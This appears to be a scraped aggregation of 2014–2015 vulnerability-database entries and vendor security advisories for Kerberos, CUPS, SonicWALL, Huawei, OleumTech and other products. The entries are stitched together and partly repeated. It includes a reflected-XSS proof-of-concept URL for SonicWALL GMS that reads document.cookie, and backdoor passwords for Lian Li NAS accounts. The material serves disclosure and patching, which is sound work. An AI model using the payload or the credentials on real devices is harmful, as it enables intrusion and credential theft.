krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-4341
https://access.redhat.com/security/cve/CVE-2014-4342
https://access.redhat.com/security/cve/CVE-2014-4343
https://access.redhat.com/security/cve/CVE-2014-4344
https://access.redhat.com/security/cve/CVE-2014-4345
https://access.redhat.com/security/cve/CVE-2014-5352
https://access.redhat.com/security/cve/CVE-2014-5353
https://access.redhat.com/security/cve/CVE-2014-9421
https://access.redhat.com/security/cve/CVE-2014-9422
https://access.redhat.com/security/cve/CVE-2014-9423
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi
gZD8EL2lSaLXnIQxca8zLTg=
=aK0y
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - i386, x86_64
3.
It was found that if a KDC served multiple realms, certain requests could
cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes
| VAR-201410-0037 | CVE-2013-7408 | F5 BIG-IP Analytics Vulnerability in |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
F5 BIG-IP Analytics 11.x before 11.4.0 uses a predictable session cookie, which makes it easier for remote attackers to have unspecified impact by guessing the value.
An attacker can exploit this issue to gain access to the affected application.
BIG-IP Analytics 11.0.0 through 11.3.0 are affected. F5 BIG-IP Analytics is a set of web application performance analysis software developed by F5 Corporation of the United States. The software provides detailed analysis of performance metrics such as transactions per second, server latency, web page load time, and response throughput, among others
| VAR-201407-0223 | CVE-2014-5024 | plural Dell SonicWALL Product sgms/panelManager Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter. Multiple Dell SonicWALL Products are prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following products are vulnerable:
Dell SonicWALL Global Management System
Dell SonicWALL Analyzer
Dell SonicWALL Universal Managemnet Appliance. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA is a set of universal management device software. I. VULNERABILITY
-------------------------
Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701
II. BACKGROUND
-------------------------
Dell® SonicWALL® provides intelligent network security and data protection
solutions that enable customers and partners to dynamically secure,
control, and scale their global networks.
III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in DELL SonicWALL GMS.
The code injection is done through the parameter "node_id" in the page
“/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=(HERE
XSS)”
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “node_ID” correctly.
https://10.200.210.222:8443/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=aaaaaaa'</script><body
onload=alert(document.cookie)>&panelidz=0,4#tabs-4
V.
VI. SYSTEMS AFFECTED
-------------------------
Tested DELL SonicWALL Analyzer v7.2 (build 7220.1700)
VII. SOLUTION
-------------------------
https://support.software.dell.com/product-notification/128245
By William Costa
william.costa@gmail.com
| VAR-201408-0298 | CVE-2014-4343 | MIT Kerberos 5 of lib/gssapi/spnego/spnego_mech.c of SPNEGO Initiator init_ctx_reselect Function double memory vulnerability |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Double free vulnerability in the init_ctx_reselect function in the SPNEGO initiator in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.10.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via network traffic that appears to come from an intended acceptor, but specifies a security mechanism different from the one proposed by the initiator. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions.
Versions prior to Kerberos 5 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
CVE-2014-4344
An unauthenticated or partially authenticated remote attacker can
cause a NULL dereference and application crash during a SPNEGO
negotiation by sending an empty token as the second or later context
token from initiator to acceptor.
For the stable distribution (wheezy), these problems have been fixed in
version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in
version 1.12.1+dfsg-7. ==========================================================================
Ubuntu Security Notice USN-2310-1
August 11, 2014
krb5 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu
12.04 LTS. This
issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected
Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
(CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon
incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
krb5-admin-server 1.12+dfsg-2ubuntu4.2
krb5-kdc 1.12+dfsg-2ubuntu4.2
krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2
krb5-otp 1.12+dfsg-2ubuntu4.2
krb5-pkinit 1.12+dfsg-2ubuntu4.2
krb5-user 1.12+dfsg-2ubuntu4.2
libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2
libgssrpc4 1.12+dfsg-2ubuntu4.2
libk5crypto3 1.12+dfsg-2ubuntu4.2
libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2
libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2
libkdb5-7 1.12+dfsg-2ubuntu4.2
libkrad0 1.12+dfsg-2ubuntu4.2
libkrb5-3 1.12+dfsg-2ubuntu4.2
libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS:
krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5
krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5
krb5-user 1.10+dfsg~beta1-2ubuntu0.5
libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5
libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5
libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5
libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5
libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5
libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS:
krb5-admin-server 1.8.1+dfsg-2ubuntu0.13
krb5-kdc 1.8.1+dfsg-2ubuntu0.13
krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13
krb5-pkinit 1.8.1+dfsg-2ubuntu0.13
krb5-user 1.8.1+dfsg-2ubuntu0.13
libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13
libgssrpc4 1.8.1+dfsg-2ubuntu0.13
libk5crypto3 1.8.1+dfsg-2ubuntu0.13
libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13
libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13
libkdb5-4 1.8.1+dfsg-2ubuntu0.13
libkrb5-3 1.8.1+dfsg-2ubuntu0.13
libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-crypt/mit-krb5 < 1.13 >= 1.13
Description
===========
Multiple vulnerabilities have been discovered in MIT Kerberos 5. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All MIT Kerberos 5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.13"
References
==========
[ 1 ] CVE-2014-4341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4341
[ 2 ] CVE-2014-4343
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4343
[ 3 ] CVE-2014-4345
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4345
[ 4 ] CVE-2014-5351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5351
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-53.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update
Advisory ID: RHSA-2015:0439-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html
Issue date: 2015-03-05
CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343
CVE-2014-4344 CVE-2014-4345 CVE-2014-5352
CVE-2014-5353 CVE-2014-9421 CVE-2014-9422
CVE-2014-9423
=====================================================================
1. Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
Kerberos is a networked authentication system which allows clients and
servers to authenticate to each other with the help of a trusted third
party, the Kerberos KDC.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
A NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO
acceptor for continuation tokens. A remote, unauthenticated attacker could
use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind)
when it was used with an LDAP back end for the KDC database. A remote,
authenticated attacker could potentially use this flaw to execute arbitrary
code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5
library processed valid context deletion tokens. An attacker able to make
an application using the GSS-API library (libgssapi) call the
gss_process_context_token() function could use this flaw to crash that
application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote,
authenticated attacker with the permissions to set the password policy
could crash kadmind by attempting to use a named ticket policy object as a
password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid
External Data Representation (XDR) data. An authenticated user could use
this flaw to crash the MIT Kerberos administration server (kadmind), or
other applications using Kerberos libraries, using specially crafted XDR
packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind)
incorrectly accepted certain authentication requests for two-component
server principal names. A remote attacker able to acquire a key with a
particularly named principal (such as "kad/x") could use this flaw to
impersonate any user to kadmind, and perform administrative actions as that
user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS
implementation (libgssrpc) handled certain requests. An attacker could send
a specially crafted request to an application using libgssrpc to disclose a
limited portion of uninitialized memory used by that application.
(CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled
certain requests. A remote, unauthenticated attacker able to inject packets
into a client or server application's GSSAPI session could use either of
these flaws to crash the application. An
attacker able to spoof packets to appear as though they are from an GSSAPI
acceptor could use this flaw to crash a client application that uses MIT
Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the
CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT
Kerberos project acknowledges Nico Williams for helping with the analysis
of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which
provides a number of bug fixes and enhancements, including:
* Added plug-in interfaces for principal-to-username mapping and verifying
authorization to user accounts.
* When communicating with a KDC over a connected TCP or HTTPS socket, the
client gives the KDC more time to reply before it transmits the request to
another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
* The Kerberos client library did not recognize certain exit statuses that
the resolver libraries could return when looking up the addresses of
servers configured in the /etc/krb5.conf file or locating Kerberos servers
using DNS service location. The library could treat non-fatal return codes
as fatal errors. Now, the library interprets the specific return codes
correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
* Added support for contacting KDCs and kpasswd servers through HTTPS
proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
4. Solution:
All krb5 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf
1102837 - Please backport improved GSSAPI mech configuration
1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly
1109919 - Backport https support into libkrb5
1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext
1118347 - ksu non-functional, gets invalid argument copying cred cache
1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens
1121789 - CVE-2014-4343: use-after-free crash in SPNEGO
1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators
1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens
1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure
1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)
1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update
1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name
1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)
1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)
1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)
1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)
1184629 - kinit loops on principals on unknown error
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
ppc64:
krb5-debuginfo-1.12.2-14.el7.ppc.rpm
krb5-debuginfo-1.12.2-14.el7.ppc64.rpm
krb5-devel-1.12.2-14.el7.ppc.rpm
krb5-devel-1.12.2-14.el7.ppc64.rpm
krb5-libs-1.12.2-14.el7.ppc.rpm
krb5-libs-1.12.2-14.el7.ppc64.rpm
krb5-pkinit-1.12.2-14.el7.ppc64.rpm
krb5-server-1.12.2-14.el7.ppc64.rpm
krb5-server-ldap-1.12.2-14.el7.ppc64.rpm
krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x:
krb5-debuginfo-1.12.2-14.el7.s390.rpm
krb5-debuginfo-1.12.2-14.el7.s390x.rpm
krb5-devel-1.12.2-14.el7.s390.rpm
krb5-devel-1.12.2-14.el7.s390x.rpm
krb5-libs-1.12.2-14.el7.s390.rpm
krb5-libs-1.12.2-14.el7.s390x.rpm
krb5-pkinit-1.12.2-14.el7.s390x.rpm
krb5-server-1.12.2-14.el7.s390x.rpm
krb5-server-ldap-1.12.2-14.el7.s390x.rpm
krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-4341
https://access.redhat.com/security/cve/CVE-2014-4342
https://access.redhat.com/security/cve/CVE-2014-4343
https://access.redhat.com/security/cve/CVE-2014-4344
https://access.redhat.com/security/cve/CVE-2014-4345
https://access.redhat.com/security/cve/CVE-2014-5352
https://access.redhat.com/security/cve/CVE-2014-5353
https://access.redhat.com/security/cve/CVE-2014-9421
https://access.redhat.com/security/cve/CVE-2014-9422
https://access.redhat.com/security/cve/CVE-2014-9423
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi
gZD8EL2lSaLXnIQxca8zLTg=
=aK0y
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - i386, x86_64
3.
It was found that if a KDC served multiple realms, certain requests could
cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes
| VAR-201407-0712 | No CVE | MTS MBlaze Ultra Wi-Fi ZTE AC3633 Multiple Security Vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
MTS MBlaze Ultra Wi-Fi ZTE AC3633 is a wireless modem.
MTS MBlaze Ultra Wi-Fi ZTE AC3633 has a cross-site request forgery vulnerability, a security bypass vulnerability, an authentication bypass vulnerability, and an information disclosure vulnerability. A remote attacker could use these vulnerabilities to perform administrator actions, obtain sensitive information, bypass certain security restrictions, or gain access to affected devices. Other attacks are also possible
| VAR-201407-0741 | No CVE | Lian Li Network Attached Storage Multiple Security Vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Lian Li NAS 'cacert.pem' has a hard-coded FTP server key vulnerability that allows remote attackers to access the FTP server. Lian Li NAS multiple scripts have multiple cross-site request forgery vulnerabilities, which allow context-sensitive attackers to initiate cross-site request forgery attacks by enticing users to use the following specially crafted links. Lian Li Network Attached Storage is a NAS network storage device of Lian Li.
Lian Li NAS has a backdoor account vulnerability. The MySQL account has a password of "123456" and the account of "daemon" has a password of "123456". This allows remote attackers to gain privileged access to the device. Attackers can use these vulnerabilities to obtain sensitive information, bypass authentication mechanisms, and perform unauthorized operations. A password-disclosure vulnerability
2. An authentication-bypass vulnerability
3. This may aid in further attacks
| VAR-201407-0229 | CVE-2014-2360 | OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Module Vulnerable to arbitrary code execution |
CVSS V2: 7.5 CVSS V3: - Severity: MEDIUM |
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules allow remote attackers to execute arbitrary code via packets that report a high battery voltage. OleumTech is a California company that provides wireless remote monitoring equipment for industrial environments. OleumTech WIO DH2 Wireless Gateway is prone to a remote denial-of-service vulnerability.
Successful exploits may allow an attacker to cause an affected device to crash, resulting in a denial-of-service condition. OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules are both products of OleumTech Corporation in the United States
| VAR-201407-0230 | CVE-2014-2361 | OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Module Vulnerabilities in which communication is spoofed |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules, when BreeZ is used, do not require authentication for reading the site security key, which allows physically proximate attackers to spoof communication by obtaining this key after use of direct hardware access or manual-setup mode. Supplementary information : CWE Vulnerability type by CWE-320: Key Management Errors ( Key management error ) Has been identified. OleumTech is a California company that provides wireless remote monitoring equipment for industrial environments. This key cannot be read remotely when the data system is running. Multiple OleumTech Products are prone to a local security-bypass vulnerability.
Attackers with physical access to the device may exploit this issue to bypass certain security restrictions and perform unauthorized actions
| VAR-201407-0438 | CVE-2014-2968 | Huawei E355 contains a stored cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the web interface on the Huawei E355 CH1E355SM modem with software 21.157.37.01.910 and Web UI 11.001.08.00.03 allows remote attackers to inject arbitrary web script or HTML via an SMS message. Huawei Provided by E355 Contains a cross-site scripting vulnerability. Huawei Provided by E355 Is a wireless router with a web interface for management and other services. Huawei E355 is a wireless network card product. Huawei E355 is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
E355 running firmware versions CH1E355SM is vulnerable; other versions may also be affected. Huawei E355 CH1E355SM modem and Web UI are both products of China Huawei (Huawei)
| VAR-201407-0231 | CVE-2014-2362 | OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Module Vulnerabilities that can break cryptographic protection mechanisms |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules rely exclusively on a time value for entropy in key generation, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by predicting the time of project creation. Supplementary information : CWE Vulnerability type by CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) ( Weak in cryptography PRNG Use of ) Has been identified. OleumTech is a California company that provides wireless remote monitoring equipment for industrial environments. Because the site security key is generated using the time64() function in the standard C library, the attacker exploits the vulnerability to obtain the site security key.
Attackers can leverage this weakness to aid in brute-force attacks. Other attacks are also possible. A remote attacker could exploit this vulnerability to compromise password protection by predicting when an item was created
| VAR-201407-0413 | CVE-2014-5029 | CUPS of Web Vulnerability to read arbitrary files in the interface |
CVSS V2: 1.5 CVSS V3: - Severity: LOW |
The web interface in CUPS 1.7.4 allows local users in the lp group to read arbitrary files via a symlink attack on a file in /var/cache/cups/rss/ and language[0] set to null. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-3537. CUPS is prone to a local privilege-escalation vulnerability.
An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Other attacks may also be possible.
Note: This issue is the result of an incomplete fix for the issue described in 68788 (CUPS Web Interface CVE-2014-3537 Local Privilege Escalation Vulnerability).
An attacker with local access could potentially exploit this issue to gain elevated privileges.
CUPS 1.7.4 and earlier versions are vulnerable. The system is based on the Internet Printing Protocol (IPP) and provides most PostScript and raster printer services. ============================================================================
Ubuntu Security Notice USN-2341-1
September 08, 2014
cups vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
CUPS could be made to expose sensitive information, leading to privilege
escalation.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
cups 1.7.2-0ubuntu1.2
Ubuntu 12.04 LTS:
cups 1.5.3-0ubuntu8.5
Ubuntu 10.04 LTS:
cups 1.4.3-1ubuntu1.13
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: cups security and bug fix update
Advisory ID: RHSA-2014:1388-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1388.html
Issue date: 2014-10-14
CVE Names: CVE-2014-2856 CVE-2014-3537 CVE-2014-5029
CVE-2014-5030 CVE-2014-5031
=====================================================================
1. Summary:
Updated cups packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
CUPS provides a portable printing layer for Linux, UNIX, and similar
operating systems.
An attacker could use this flaw to perform a cross-site scripting attack
against users of the CUPS web interface. (CVE-2014-2856)
It was discovered that CUPS allowed certain users to create symbolic links
in certain directories under /var/cache/cups/. (CVE-2014-3537, CVE-2014-5029, CVE-2014-5030, CVE-2014-5031)
The CVE-2014-3537 issue was discovered by Francisco Alonso of Red Hat
Product Security.
These updated cups packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes.
All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing this
update, the cupsd daemon will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
